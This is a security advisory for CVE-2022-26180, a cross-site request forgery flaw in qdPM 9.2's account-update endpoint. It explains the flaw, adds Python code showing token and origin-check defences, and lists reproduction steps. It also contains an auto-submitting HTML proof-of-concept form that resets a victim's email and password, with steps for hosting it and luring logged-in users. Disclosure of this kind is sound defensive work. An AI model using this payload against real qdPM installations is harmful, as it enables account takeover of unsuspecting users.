CVE-2022-26180: qdPM 9.2 CSRF Vulnerability in index.php/myAccount/update URI


Unauthorized actions can be performed on behalf of authenticated users, compromising the security of qdPM 9.2

ASWIN K V


Summary:

The qdPM 9.2 application is susceptible to Cross-Site Request Forgery (CSRF) through the “index.php/myAccount/update” URI. The flaw lets an attacker carry out unauthorized operations on behalf of an authenticated user, which puts the security and integrity of the application at risk.

Description:

Cross-Site Request Forgery (CSRF) attacks are possible through the “index.php/myAccount/update” URI of the qdPM 9.2 application. Because of this flaw, an attacker can change the account settings of an authenticated user and perform unauthorized actions on their behalf.

All changes to user accounts, including changing passwords, email addresses, and personal information, go through the “index.php/myAccount/update” endpoint. This endpoint, however, is not protected against CSRF: it accepts a state-changing POST without any token or origin check tying the request to a page the application itself rendered, so it is open to exploitation.

To exploit the issue, a malicious web page or HTML email needs a form that sends a request to the “index.php/myAccount/update” URI. The form contains the fields required to change the targeted user’s account information.

For the CSRF attack to be effective, an authenticated user must be persuaded to visit the malicious website or click on the forged link while signed in to their qdPM account. Once the user interacts with the form, the browser sends the malicious request automatically, together with the user’s session cookie, which results in unauthorized changes to their account.
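The description above comes down to one missing control: the update endpoint cannot tell a request submitted from the application’s own account page apart from one submitted by a form on a foreign site. The following example is added here and is not qdPM’s code; it is written in Python rather than the application’s PHP so it runs stand-alone, and the names APP_ORIGIN, SERVER_SECRET, Session, Request, handle_my_account_update and the sample data are constructed for this illustration. It shows the two server-side defences that close this class of issue, a synchronizer token bound to the session and an Origin/Referer check, and runs one legitimate update and one forged request shaped like the advisory’s PoC (foreign origin, email and password fields, no token) to show that only the legitimate one changes the account.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass

# Constructed values for this example: the application's own origin and a
# server-side secret that never leaves the server.
APP_ORIGIN = "https://qdpm.example.test"
SERVER_SECRET = secrets.token_bytes(32)


@dataclass
class Session:
    session_id: str
    email: str
    password: str  # plain text only to keep the example short; real code stores a hash


@dataclass
class Request:
    method: str
    headers: dict
    form: dict
    session: Session  # the session the browser's cookie resolved to


def issue_csrf_token(session: Session) -> str:
    """Synchronizer token bound to the session: HMAC(secret, session_id).

    The application embeds this in its own myAccount form as a hidden field.
    A page on another origin cannot read it, so it cannot include it in a forged POST.
    """
    return hmac.new(SERVER_SECRET, session.session_id.encode(), hashlib.sha256).hexdigest()


def origin_allowed(headers: dict) -> bool:
    """Second, independent check: the browser-supplied Origin/Referer must be ours."""
    origin = headers.get("Origin")
    if origin is not None:
        return origin == APP_ORIGIN
    referer = headers.get("Referer")
    if referer is not None:
        return referer.startswith(APP_ORIGIN + "/")
    # No provenance at all on a state-changing request: fail closed.
    return False


def handle_my_account_update(req: Request) -> tuple[int, str]:
    """Hardened equivalent of a myAccount/update handler (example, not qdPM's code)."""
    if req.method != "POST":
        return 405, "method not allowed"
    if not origin_allowed(req.headers):
        return 403, "cross-site request rejected"
    submitted = req.form.get("_csrf_token", "")
    # Constant-time comparison so the check does not leak the token byte by byte.
    if not hmac.compare_digest(submitted, issue_csrf_token(req.session)):
        return 403, "missing or invalid CSRF token"
    # Only now is the request trusted enough to touch the account.
    if "email" in req.form:
        req.session.email = req.form["email"]
    if "password" in req.form:
        req.session.password = req.form["password"]
    return 200, "account updated"


def demo() -> dict:
    """Run one legitimate update and one forged update; return both outcomes."""
    victim = Session(session_id=secrets.token_hex(16), email="user@example.test", password="old")

    # Legitimate request: rendered by our own page, so it carries our Origin and the token.
    good = Request(
        method="POST",
        headers={"Origin": APP_ORIGIN},
        form={"_csrf_token": issue_csrf_token(victim), "email": "user+new@example.test"},
        session=victim,
    )
    good_status, _ = handle_my_account_update(good)

    # Forged request in the shape of the advisory's PoC: the browser attaches the
    # victim's session cookie, but the Origin is the foreign page and no token is present.
    forged = Request(
        method="POST",
        headers={"Origin": "https://evil.example.test"},
        form={"email": "attacker@example.test", "password": "newpassword123"},
        session=victim,
    )
    forged_status, _ = handle_my_account_update(forged)

    return {
        "legitimate_status": good_status,
        "forged_status": forged_status,
        "email_after": victim.email,
        "password_after": victim.password,
    }


if __name__ == "__main__":
    print(demo())
```

Either check alone would have stopped the PoC form, and they fail independently: the token check catches a forged request even when Origin is absent, and the origin check catches a request that somehow obtained a token. In a deployed application the session cookie should also carry the SameSite attribute, which keeps the browser from attaching it to a cross-site form post in the first place; that is a cookie setting rather than handler logic, so the example does not model it.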

Steps To Reproduce:

1. Log in to the qdPM application with a valid user account.

2. Navigate to the “index.php/myAccount/update” page.

3. Craft a malicious web page or HTML email containing a form that submits a request to update the user’s account details.

4. Include the CSRF payload, targeting the “index.php/myAccount/update” URI, in the form submission.

5. Convince the authenticated user to visit the malicious web page or click on the crafted link while logged in to qdPM.

6. Once the user interacts with the form, the malicious request is automatically sent, resulting in the unauthorized modification of the user’s account details.

Proof of Concept (PoC):

1. Set up a testing environment with qdPM 9.2 installed.

2. Log in to the qdPM application with a valid user account.

3. Create an HTML file named “csrf_poc.html”.

4. Edit the “csrf_poc.html” file and insert the following code:

<html>
<body>
<h1>CSRF PoC - qdPM 9.2</h1>
<form action="https://target.qdpm.com/index.php/myAccount/update" method="POST" id="csrfForm">
<input type="hidden" name="email" value="attacker@example.com" />
<input type="hidden" name="password" value="newpassword123" />
<!-- Additional fields can be added here to modify other account settings -->
</form>
<script>
document.getElementById('csrfForm').submit();
</script>
</body>
</html>

5. Replace “https://target.qdpm.com” with the actual URL of the qdPM application you are testing.

6. Customize the hidden input fields to specify the desired changes to the user’s account details (e.g., email, password), then save the “csrf_poc.html” file.

7. Host the file on a web server or transfer it to a location accessible by the target user.

8. Craft a convincing message or webpage enticing the authenticated user to visit the URL hosting the “csrf_poc.html” file.

9. Once the user accesses the malicious page, the form will automatically submit the CSRF request to the “index.php/myAccount/update” URI, modifying the user’s account details without their knowledge.

Impact:

- Modifying the user’s account details, such as email address, password, or personal information.
- Enabling or disabling certain account settings.
- Potentially gaining unauthorized access to sensitive information.
- Performing actions with serious consequences, depending on the user’s role and permissions within the application.